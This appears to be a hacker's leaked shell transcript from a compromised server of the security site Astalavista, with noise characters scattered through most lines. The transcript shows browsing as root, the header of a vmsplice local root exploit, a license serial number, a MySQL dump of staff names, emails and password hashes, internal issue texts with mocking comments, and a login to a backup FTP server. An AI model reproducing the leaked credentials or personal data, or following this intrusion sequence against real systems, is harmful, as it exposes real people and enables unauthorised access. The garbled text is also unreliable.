# }# H/ X! k, G1 G* ?. C2 ]9 e# p' Msh-3.2# cd com6 U8 d* @$ \% |$ W, F6 l& [
sh-3.2# ls -la9 E, }* _6 `2 w" |8 a q
total 1412080 J( W6 W0 W, W, D) }( X5 C2 f7 R
drwx–x–x 10 com com 4096 Apr 28 12:40 .3 x p B! W* w) d
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: `7 {) n3 f- O+ |drwx—— 2 com com 4096 Jun 4 04:04 backups
8 k1 f! |% |5 s' Y) F: c1 Q9 T: }-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql2 e7 P8 s3 P2 v/ E( u+ [
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
8 Q8 e" K7 V& ? [5 u-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
, O' e2 k+ @+ j: P1 z$ H# O6 M! S3 s-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
0 ], X3 C9 x0 n2 i. M" ?9 O0 m9 h" w-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
5 w& ]* i# b, a, x-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
2 I, j$ d1 C& S! a. Q: adrwx–x–x 3 com com 4096 Jan 29 2008 domains
. s5 I+ B; d' J! {" R-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed8 n; q p+ A" u& f d6 z+ I
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
) [% T D: {: u$ @7 Y-rw——- 1 com com 69 Nov 18 2008 .lesshst
5 @: K. n8 b3 x3 j8 Q, Q2 Jdrwx—— 2 com com 4096 Sep 24 2007 mail
% @ W/ S# ^+ e+ z; j4 x' _-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
8 j, {/ c2 Q1 s/ Q/ S, ]) Ldrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp; Y" c: t# t B9 n
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
! Y' T. ~! @7 ~+ i- A-rw-r—– 1 com mail 34 Sep 24 2007 .shadow. I3 m1 ` P8 U7 Z* ~6 Z
drwx—— 2 com com 4096 Aug 26 2008 .ssh
# I9 M% V9 ]) B-rwx—— 1 com com 8515 Feb 10 2008 t
% ?% i! E8 |( @. w3 ~! v( A-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c4 K: _6 ~9 I# i3 x9 K
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp% \ M$ [$ q8 W9 O( b
-rw-rw-r– 1 com com 617 May 20 2008 .toprc, Z* A: O$ Z! F5 t/ B# A! W
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
R$ ?6 f Q4 w- V; \. T, A. ]% Y! O7 W-rw——- 1 com com 16629 Mar 28 21:46 .viminfo$ w% R( z$ _2 i( V
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc- p( p0 R) }) `' _/ ?
+ l% ~) t' Q3 S, f0 S' ?; @2 Ksh-3.2# head t.c n5 z* Q. ?. j& e
/*8 f, c9 Q* z1 ]2 x# w# _
* jessica_biel_naked_in_my_bed.c
( [2 v& c+ r( J# T*8 {9 z0 v( K3 V2 O% p
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.4 T+ u; I/ e4 T% O7 b" T6 F$ B
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
1 a9 `. H, P* S2 e: e& D* Stejnak je to stare jak cyp a aj jakesyk rozbite.5 X; @& L \& ~3 l8 V) j
*% Z$ s( N" S5 o7 D
* Linux vmsplice Local Root Exploit( @3 }: L( g/ W5 _& m/ B
* By qaaz
, Y, D; K: w; Y/ r" b! F% [! [5 V*1 c+ q U: U1 V9 I) ^2 G
( p1 W1 ^, F- C' M
sh-3.2# cd /
8 p5 q2 ?7 i5 @" ksh-3.2# ls -la
* S" v* j( ?7 n5 r, w2 T5 d2 f( stotal 360/ j$ @, \* I0 ]% d" q6 ]1 x4 d" C
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
. ?/ D9 I$ O- |: q0 @# I; Zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..6 k# D+ D* L1 d, L# C P1 w# X! D1 G
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group; D) o, u! E: V7 S
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user/ i; Q' ~( {0 B+ I& p( V
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db5 j- h, y* I1 Z {/ U9 O
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
8 p" V+ e: [$ g$ z+ Z: i-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
5 U% z+ k8 F/ N0 r/ \drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
; k% U# S( g% Z3 Ldrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
$ Z& c G" P7 X! J) N2 hdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot* ^. v8 i, c; @# I
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev) \/ T% q% ~; z. ?5 l! z1 a& }2 n
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc k7 m' ^& P: n% N+ q+ B- X
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
' S& R% j; u1 j+ W-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
" X8 W/ z% ]2 qdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
& k8 Y8 K& B8 @# @8 [% j9 G0 |- ]. Odrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64) a6 t, X3 S5 ]* F
drwx—— 2 root root 16384 Sep 11 2007 lost+found( s2 n" u0 b' f% t
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media2 `2 ]1 I7 g# [" E4 [
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc7 K6 k' P p9 n$ q; D8 V
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
9 k/ o/ K2 b4 v! t. Z1 J-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
9 v/ g4 i% N) I3 s( f6 C: f' \drwxr-xr-x 2 root root 0 Jun 3 02:43 net6 A& T. q! _3 a2 W6 A5 x3 g: ]
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt( f' P% q* P( s: W
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc L( i+ G6 ?8 ?- X( A' c
drwxr-x— 15 root root 4096 Jun 4 08:40 root
/ h0 I8 ^$ `* s0 Mdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
7 a& R. F( n6 i0 H- E( Hdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux5 J5 P" \% v# i8 F- j0 j
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv& D) c! C. A& K
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys( S, n& w2 s& A4 x9 D2 `) C' y
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
' t) Q+ l7 P( @; h! Jdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
8 k' q/ t% B0 Qdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var( O- x0 c: y8 M9 |7 i4 Y
' e% D; W' `/ j6 ?) I0 Tsh-3.2# cd opt
' }% Q4 s7 R* c1 Osh-3.2# ls -la
# H0 a$ m% B+ X+ T7 @& R( Ntotal 201 } C$ b/ q. K0 x. w- L
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
5 z4 S$ A! R0 `& i9 Kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..0 h; P/ t2 Q' s# Q+ W3 o/ i
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
; p& n0 Y/ a" N& ~: \0 K; J3 U2 p
sh-3.2# cd lsws/$ T4 p( O* O) @& C) u2 x% y
sh-3.2# ls -la
, a. ~ o. Q6 u& e& rtotal 108& g- M' M. @) W1 m, H$ L
drwxr-xr-x 15 root root 4096 Mar 20 2008 .$ _/ G" m6 s5 k" K" m* v
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
+ Z% j' E& Q; f4 [1 d7 k; p( J" q, [drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
) Y) Q# g% C' A. l; _drwxr-xr-x 13 root root 4096 May 29 15:10 admin
B- @. ^ a/ o( ]) i& Z# odrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
; W# } }' ^2 @) Q& Kdrwxr-xr-x 2 root root 4096 May 29 15:10 bin4 g& t8 m) V& Z$ } ?* {3 W8 e, W6 W
drwx—— 4 apache apache 4096 Jun 3 02:43 conf" }& c: c: T9 f2 a+ e. i8 W/ V/ k
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
5 c( _: J" O9 F- Q0 pdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
3 V; ^1 O8 x* [! F: A$ Jdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
k1 B$ D& h0 t9 Udrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
) s* k! Y4 k# B/ i4 ^9 ~! a-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE7 `6 g# a# q% n: S) X
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
) J# _& S! }9 X2 Z* |4 z( t( p-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
- W( B" Q8 G0 t: e$ X8 b, C-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
0 d! p4 ^3 O3 i1 ?" Udrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
# D1 s* S, q! ?" W0 L5 h1 udrwxr-xr-x 2 root root 4096 Mar 20 2008 php6 _% _, J4 H) P5 l3 g* O+ L! ]4 v
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild9 I! I& X) b: _/ C/ Y
drwxr-xr-x 3 root root 4096 Mar 20 2008 share/ q# N' J/ \, K+ m" ^
-rw-r–r– 1 root root 6 May 29 15:10 VERSION6 J# K) i _ f/ r# u
5 w1 ]8 P# k: Y" ^0 W
sh-3.2# cd conf
: _( S3 ]9 u) s6 Dsh-3.2# ls -la0 E4 G- c: v( G4 o+ n; ]. ^
total 48) F8 z( |, r" S0 q- t9 E
drwx—— 4 apache apache 4096 Jun 3 02:43 .
9 a3 t9 t4 p, }3 m N1 Y" Vdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
2 X( p1 U# N% x5 Vdrwx—— 2 apache apache 4096 Mar 20 2008 cert
3 v1 k) J7 X7 n% x$ F-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml0 u5 t" ~4 F' g+ ? p
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
6 Y" \# J0 v' k. F-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
% N1 S/ z: X" d7 ^-rw——- 1 apache apache 256 May 29 15:10 license.key
- s& y' {) c& p) o( ]/ K* h-rw——- 1 apache apache 256 Mar 21 2008 license.key.old% [+ ]# X1 \/ W" l5 _( |" i
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties/ M' C, V& T- b9 R/ K# U* C
-rw——- 1 apache apache 20 May 29 15:10 serial.no
1 v8 W+ b9 r: S: b! j% m5 Edrwx—— 2 apache apache 4096 Mar 20 2008 templates) z+ q5 v8 ~, I2 o6 v
7 d' }# ?! I, E/ msh-3.2# cat serial.no
2 G7 n$ {4 Q& L! KIbDl-oVsO-CKqL-wVRa
2 p q! O3 t S3 W5 o( v8 x% f. T% R* f
sh-3.2# mysql0 W2 h1 u- U2 E& a* r0 w8 _
Welcome to the MySQL monitor. Commands end with ; or \g.* V0 q ^6 C$ e1 y Z2 x0 Y
Your MySQL connection id is 2868440 W. m1 `8 ~' D5 B& D& J0 M
Server version: 5.0.45-community-log MySQL Community Edition (GPL)- |- V# k* J3 g3 o
7 e; v+ o9 e5 X0 P" ]1 W9 i! W2 yType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- {$ z$ v8 |& T3 K2 |+ G- j* W
* t$ d. n* L: H; I! H4 P% Fmysql> show databases;; S( Z% ?, R( H* r( N6 O
+———————–+0 |$ p& k4 A$ Y
| Database |
5 i* {2 Q9 K7 T" `% d+———————–+/ W9 @: V5 n# S2 j4 ~
| information_schema |
& ~7 {) Z( B- y$ d8 A| astanet_ads |: {# q3 o4 s' f& @, A: \7 ?* k
| astanet_mailing_lists |
3 s9 P8 z8 [/ B: i| astanet_mediawiki |7 z6 T9 M% e, U0 I* Q* a$ R( D. y
| astanet_membersystem |
9 P, E$ }: D4 Q& `| com_contrexx |8 S# U9 s' J. ~3 H K+ B2 W; x6 L
| com_contrexx2 |# F+ r {+ L/ K
| com_contrexx2_live |
2 V* Q# i/ k7 E$ R8 W| da_roundcube |
6 W4 ]5 U3 f/ ~$ H6 ]4 d| dolphin |# g% {3 ~+ ]( ]3 _2 H2 G
| ideapool |, w# Z" G% g" E2 ]' w" `
| mysql |5 K1 z k% U5 q' ^, B" X0 [. E
| test |
' |" Q, H$ W6 ^' y6 `/ e+ V5 a| yourmaster |7 X- \0 E+ L, E5 n7 ~" Z
+———————–+
- q5 L) c/ g. d/ G+ ~! T, o1 C14 rows in set (0.00 sec) j" v. U, N) L1 J; q
. h7 q1 R' S& A" @5 Q4 nmysql> use ideapool5 p/ G! r7 N7 m0 X$ i: B: {; [
Database changed# `* |0 M0 ?# F6 x$ p, i1 s
mysql> show tables;
0 Z( p5 h3 m* d3 L7 [) ^+———————————–+
: n- @! w. q$ z9 L: M| Tables_in_ideapool |
8 t- |; b' @: J, Y: x* t- E+———————————–+
9 g9 p" ?+ {/ ?| eventum_columns_to_display |4 z/ z. P7 u! F/ J4 [" b
| eventum_custom_field | n9 e$ U- o( Q, r! I+ `- l; F6 |
| eventum_custom_field_option |* U& y/ U2 H5 \- _3 j6 f" g
| eventum_custom_filter |
3 C: \8 l8 d# y$ E7 K. ^| eventum_customer_account_manager |
0 S0 ]: r( Q3 D0 d7 Y3 j| eventum_customer_note |5 B3 h6 j; w/ ]" x; \
| eventum_email_account |- N. f! Z$ h; {9 M+ m5 z1 E
| eventum_email_draft |
7 w+ p0 @! M6 W- m1 _| eventum_email_draft_recipient |$ F% l2 k/ R" d! U2 h
| eventum_email_response |8 Z4 l2 m( e. \3 k, W% ]8 T" G
| eventum_faq |
% W/ V" Y; v3 k( k' Q| eventum_faq_support_level |! n. y/ \" c V- h. K/ C G$ n: _
| eventum_group |
' H8 w) ^- D8 q3 j$ \9 g& w5 G- n: m| eventum_history_type |
! p g6 p% j$ S| eventum_irc_notice |
/ `+ t! i8 q: P- n% _| eventum_issue |
9 X: _9 G) Q& U. `8 f% O4 q! t8 V| eventum_issue_association |6 |3 u% q; M i0 p7 ^- a
| eventum_issue_attachment |7 N3 u" _! e' p' S
| eventum_issue_attachment_file |+ f5 N$ \6 {. h/ _! I% e
| eventum_issue_checkin |
# g0 D e5 _- e" O ]" O9 U9 c| eventum_issue_custom_field |
$ o0 @" a- B: ~) L) N0 G9 K8 C% || eventum_issue_history |+ Y# o; U4 m; {- u
| eventum_issue_quarantine |
* \2 z! R( h: Y9 U) F& || eventum_issue_requirement |
3 Q8 U2 J+ S' q9 ]1 B2 ^| eventum_issue_user |1 p2 O! V7 j7 I# ?. ?- u
| eventum_issue_user_replier |
+ R9 w. }7 C# ^6 |/ \) G- b| eventum_link_filter |
, a1 J) } Y; }1 G2 l% [: \| eventum_mail_queue |, U: ^# u- w1 U3 ?1 J
| eventum_mail_queue_log |) ]3 ?( j( K* @/ a4 ?
| eventum_news |
% U+ [# [7 K; e9 k* v| eventum_note |
- @$ L, D. U2 r2 F| eventum_phone_support |3 u p4 s d2 o5 N5 S8 C
| eventum_project |
7 _; O% n7 @2 Y+ y5 c# y| eventum_project_category |
3 ?1 D5 w1 U+ [' v4 e7 C8 I! s| eventum_project_custom_field |
8 s" R$ T; D: K; g% g+ h( h9 t" j4 P| eventum_project_email_response |8 A% S: G7 t, r( ~
| eventum_project_field_display |. t" y2 x; }: g: O: `
| eventum_project_group |' o/ e0 k+ A3 A% H% l' H* b
| eventum_project_link_filter |
6 z8 w; }& P/ T ?6 P/ c| eventum_project_news |; G. \! }7 J; p9 C+ X9 W! h! W" s4 }) Q
| eventum_project_phone_category |
$ g- r; r7 M- j& I" I) s| eventum_project_priority |
% E& t# }- K2 u% v" T% j| eventum_project_release |9 C* I* c) n. |" p
| eventum_project_round_robin |
4 x" P2 o# W8 h' @2 V2 }| eventum_project_status |
/ j! n2 ^( X4 ?' _7 m2 h* S| eventum_project_status_date |+ X" |6 e/ J# v1 o( L
| eventum_project_user |" H2 X$ B: D# }( }: O- s5 Z/ v
| eventum_reminder_action |
* T* R% e' Z+ k| eventum_reminder_action_list |: I8 y' ]& J2 o( Z4 A
| eventum_reminder_action_type |3 n& p; U( ]% c4 F; e2 e
| eventum_reminder_field |, I N5 K! \. A) Q; O0 M# Y |
| eventum_reminder_history |
. C" g; e4 s$ W6 P| eventum_reminder_level |
' }) F1 ~' \- H* q| eventum_reminder_level_condition |
- J' [5 s; O8 w2 u& B| eventum_reminder_operator |; B9 n, B8 h6 S( h
| eventum_reminder_priority |
4 \, r2 x- N# x. N, O# Z| eventum_reminder_requirement |% I" S! M) R& p$ W
| eventum_reminder_triggered_action |/ z* j/ k3 O: K% g# C" ?
| eventum_resolution |# X, h2 W. T' E! F! D
| eventum_round_robin_user |
5 s3 E p4 [$ J9 S, s| eventum_search_profile |
% Q4 r" P& I% I7 e6 x2 v| eventum_status |" {4 X, r5 l6 Y
| eventum_subscription | p: O. M" P% Y' n7 m8 u1 Q
| eventum_subscription_type |
8 ]% T6 \! T$ X| eventum_support_email |
$ u; @: \+ R) p| eventum_support_email_body |
5 e7 }% ^: l" c/ V| eventum_time_tracking |
. y6 p9 n$ k' m" Q| eventum_time_tracking_category |
6 D4 R0 J/ t" J: i! \. L" [" Z& r7 a| eventum_user |0 L3 K! k7 S Q0 H& M& O
+———————————–+7 S9 t9 p7 ? U* t( b) v
69 rows in set (0.00 sec)
& e$ k& o+ c9 P' s" U# U. _4 t
3 t w7 R* V6 Tmysql> describe eventum_user;# t" a8 t' U( R
+————————-+——————+——+—–+———————+—————-+
( ]+ l& a) Q8 r) R| Field | Type | Null | Key | Default | Extra |
1 s1 L5 |& \- W+ [+————————-+——————+——+—–+———————+—————-+
( y' E9 T) l: B) x: _8 u7 z# l| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
" ?% N; _% A1 v9 I+ N% L- \2 h1 f| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |& q, e! B# Y4 X8 _
| usr_customer_id | int(11) unsigned | YES | | NULL | |
' t( W& W0 t C* Q0 u| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |2 i }% W3 t# O! B& F/ v8 f: s+ }" j
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |! o7 _4 J& A7 ~
| usr_status | varchar(8) | NO | | active | |" X3 q# X E( S1 ~2 P
| usr_password | varchar(32) | NO | | | |
5 ~8 W) a1 w7 I' t4 P9 a! A| usr_full_name | varchar(255) | NO | | | |: E) \/ r- O6 @% t5 g. e
| usr_email | varchar(255) | NO | UNI | | |! w5 B* V1 e( d: t) j7 g" c
| usr_preferences | longtext | YES | | NULL | |: M6 a. K7 m: p m a2 J
| usr_sms_email | varchar(255) | YES | | NULL | |
3 H1 V: W6 L, b: Q| usr_clocked_in | tinyint(1) | YES | | 0 | |
# `$ H# [6 `: ?2 h: _| usr_lang | varchar(5) | YES | | NULL | |8 H' p+ z, ]+ G" S9 u
+————————-+——————+——+—–+———————+—————-+
$ ^% P5 Y* K" T7 `' q* g+ q6 ?13 rows in set (0.00 sec)" _# x3 {# S1 k: B; W/ h
' n( H/ n4 C8 ^1 omysql> select usr_full_name,usr_email,usr_password from eventum_user;
7 M4 Q6 }) k: s% E0 V* e+———————-+——————————-+———————————-+
7 k* ~# T; l; P| usr_full_name | usr_email | usr_password |( Q* a9 {4 u. N8 n7 w
+———————-+——————————-+———————————-+
' B9 _% Y2 u- `' s( R| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
$ g3 R; ?1 Q' q& ^; j1 ?# \8 z| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |. e5 ]* U* N: i' U: E6 z
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |9 o1 j6 k$ H# s/ w8 X
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |$ L6 {8 y ~+ g! b: B! ?
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |; M( F. a. J2 y' @4 m
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
+ C X2 ~, p: \/ G) I+ || Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
+ F* B5 M7 {( k% P _9 e| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
+ s) o S# U) F3 S; z. z7 `| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
# N" I( m# e9 t" q, b$ }5 w! [| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
* N7 n) L8 [' z| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |7 Z9 P; K8 K: t* D. L- z" C
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e | K0 M. p; |, _8 G4 J9 X* P1 W
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
$ w, l: J7 v$ N6 |: R, t' c7 M| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
2 z5 G- S8 d% }: i1 O| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
& K9 o1 h! N3 ]7 m9 p+———————-+——————————-+———————————-+
; N) v4 @" |4 E% \' Y) a& p- b15 rows in set (0.00 sec)
" |/ g q. {! c3 r7 f# k# y2 Z: ]) n% B; y, f- V, c! c
mysql> select iss_description from eventum_issue where iss_id = 43;
8 G. k) ^6 w& i% j" G8 c( A! ]+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
2 b8 f! G0 k' i* u" G1 A$ B+ s| iss_description
6 H7 W& }$ f/ |+ t|
- O# Y+ B2 b6 o' U9 {( Z+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+/ Q, _2 K; @5 k3 w+ G4 z/ @5 F* ]
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
3 Z9 I7 H3 _6 P4 V* L# J( b* D: Vconnected for 90 mins… 120mins… so what i propose is something like:
6 D4 }3 ]/ I# ~3 J9 { v7 q3 {, z8 X链接标记[url]http://www.surfthechannel.com/[/url]
9 e9 j- H9 F& ?- k) U6 H$ U$ xsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
2 ^( h' A/ m9 b- Y/ ]7 j3 J- ~like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
" Z1 n* \! \" W8 T; abreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off3 k6 N/ T2 {! D6 Y/ M9 ~
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
( ^6 @% H. S6 _
* e% `6 [9 E+ m# \' VWe could also put advertisement during play on the flash video player itself… extra $$… D4 m0 w1 @& K! k& _7 L6 {
3 X9 G' L! y0 u3 h4 lBy sykadul |
+ A3 j+ N0 ^. c( t0 ^$ x+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ h' a0 v) n1 V! k) w7 I; ^
1 row in set (0.00 sec)9 X! o- ?' v- K2 O; D7 g
) c% {, j, u/ S6 Z4 ^; ]
// Money and extra $$ is all they care about. remember that.
" q* f/ T0 G! A% j; j) O2 y y+ U \, f
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
4 P/ K* \% ~9 z5 i; [0 y+————————+——————————————————————————————————————————————————————————————————————————————-+3 W3 x/ p% b2 y( S
| iss_summary | iss_description
& e/ {( m0 ?7 ]) S, I; f|2 _7 z4 Z' _! {6 \" ?8 E- e* S2 _
+————————+——————————————————————————————————————————————————————————————————————————————-+; Y: m" S% G! A0 R
| Forum for REAL EXPERTS | Hello,: k0 z- }6 c& n% ]
3 e1 q1 w4 T8 U
Ishtus and I,
. E- ], q2 a1 o5 R/ I" u3 r
# _. V4 Q8 D$ a0 _. z- uCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
D) ~5 N* m. D. q1 ]ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
0 ^3 Y4 p$ y; [0 L# K& Z8 Z N: R9 r+ H) [
One example a friend of mine from coresecurity.com!+ _, G# M% `* t7 ?1 P
1 d a) q5 P! r) \We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
% w; I' p& g. ]" e. c; g+ ]7 n( _
3 Z3 \8 {! i. C% b|6 o' R) E7 S6 U/ y: i. C
+————————+——————————————————————————————————————————————————————————————————————————————+ J2 v Z T6 d! E2 j
1 row in set (0.00 sec)
% K/ s& n4 v6 L& j
1 y7 u; g; O7 g: k9 s" C// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…$ u9 F7 w7 m# b& X/ S
( A3 W9 S7 ^& ~mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
; E$ m$ L$ X) C# ^! u2 l1 p+——————+———————————————————————————————+
5 Q% {/ P& a' b: r| iss_summary | iss_description |
1 N1 h8 s( ?( y/ j+——————+———————————————————————————————+
' U& R: u( V8 d8 H1 [" O0 ?/ P| Website guidance | Virtual Girl which guides you trought the website./ K3 Q- ]5 N* Y/ c" }0 R( o# t
2 `5 P( O7 u) I. c" Z0 q; l3 ^
We need a girl with who you can ( talk )!!!3 B4 n* }( k' {) ^% P: w; b
Also for the News!
1 q- L2 G7 v: @, f8 XSo my suggestion is a girl who read you the news loud if you like!
0 c/ t' J- M p# K8 [* }you can choose between read yourselfe or she read it for you or both!; C3 @" w* d% E+ r$ Y5 R
/ ]2 T9 D, ]5 w7 ~9 U# ~
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!) p. m9 V0 m0 W
; k* k" ?+ B& R( V w/ P d0 ]& z VHave a look on the example girls!!5 q2 t; @) y" m/ J9 H
1 l' L( _; m& m2 `0 z
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]6 E5 t; \0 [$ |
5 C4 w* `) K x# e! Y2 \3 X
or that+ K U, }* Y' \/ z) b
" x* N1 A- \( d l+ k0 V
链接标记[url]http://www.yellostrom.de/[/url]; `- U7 b0 t- O+ V- g0 S
# L1 \. |/ i/ I: s( W& B9 U% i
|
2 X+ ]1 I- u! Q( f. t7 [+——————+———————————————————————————————+* z4 c2 @) x( o: O. K: x
1 row in set (0.00 sec)0 M9 D1 v& ]0 b
' m' F* k! ~1 S2 o) h// ha ha.% I; X9 D0 J$ o
1 w6 `6 e3 W8 a, z1 Smysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
! B6 H0 w, ?2 }4 Y/ o; c+————————–+———————————————————————————————————–+
/ X& Y+ X- r/ ?% e0 ^) x& S| iss_summary | iss_description |
: q5 ~0 {8 F: W- d+ q# `2 q& E: T+————————–+———————————————————————————————————–+
L/ f6 S) H& f5 q# M| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |3 I" ^( B% h$ b- W
+————————–+———————————————————————————————————–+* ]; z/ I' w4 i! l$ J
1 row in set (0.00 sec)
. C X- ?4 j9 @/ p3 Q8 F: r9 S4 ^3 Q. f# a' l% x
// LOL.
5 Y8 V: S6 X5 j8 |9 o9 q' w" U6 I/ W9 S8 D( w/ P
mysql> exit+ o/ R0 `* b3 C8 W& ]9 T+ ~
Bye
! Y1 V+ ?) q, f' @
, V; N$ H, D3 f) f0 q1 }sh-3.2# ftp 212.254.194.163
6 C+ D! F, n" e# x! xConnected to 212.254.194.163.% [ V; t2 Y2 a* d+ m, H, |
220 BackupCOM_VW FTP server ready.1 O% A3 F* i+ ^0 Y1 T, ~* @
504 AUTH: security mechanism ‘GSSAPI’ not supported.
, }9 B! A( q+ s: [- M( @504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.- q* T; x. G5 m0 R
KERBEROS_V4 rejected as an authentication type. ]- t1 a* G! I
Name (212.254.194.163:root): astalavista.com
& ?2 u3 y: b% ~' k N9 A331 Password required for astalavista.com.
U# [! g9 e3 e$ Y& k- kPassword:
% _. u- r7 a2 Z& H% a0 v2 s. e230 User astalavista.com logged in.( ^* t! Q$ g& K8 [4 u) ^. a
Remote system type is UNIX.2 Y3 M5 e+ I1 L4 }% W) c
Using binary mode to transfer files.* b' k- L! n& g6 Q3 f, \
ftp> ls -la
' ?, p. ]' ^* _; J/ {: f) X227 Entering Passive Mode (212,254,194,163,2,188)
u" h; J+ A: P& O% s! F150 Opening BINARY mode data connection for ‘file list’.
' U7 L* g9 H: ^: b* M1 cdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
